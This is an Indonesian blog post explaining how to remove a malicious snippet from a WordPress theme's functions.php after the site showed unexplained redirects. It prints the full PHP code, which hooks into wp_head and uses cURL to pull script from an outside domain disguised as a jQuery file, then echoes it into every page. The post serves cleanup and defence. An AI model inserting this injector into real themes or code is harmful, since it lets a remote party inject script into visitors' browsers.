Ada yang aneh ketika saya mencoba web saya sendiri, yaitu selalu terdapat perubahan url yang selalu redirect berupa framerequest. Aneh, padahal saya tidak melakukan perubahan apa-apa. Bahkan saya cek log security pun tidak ada.
Setelah searching-searching, ketemulah masalahnya. Itu karena ada semacam malicious script pada script template/theme yang digunakan. Walau sebelumnya lancar-lancar saja.
Solusinya, coba cek file functions.php.
Lalu carilah script seperti ini :
if (!function_exists('insert_jquery_theme')) { function insert_jquery_theme() { if (function_exists('curl_init')) { $url = "http://www.wpstats.org/jquery-1.6.3.min.js"; $ch = curl_init(); $timeout = 5; curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout); $data = curl_exec($ch); curl_close($ch); echo $data; } } add_action('wp_head', 'insert_jquery_theme'); }
jika tidak ada, coba cek apakah file functions.php tersebut meng-include / require file lain lagi. Jika iya, cek file-file tersebut.
Lalu script tadi dihapus atau dijadikkan komentar. Lalu simpan.
Dan berhasil 🙂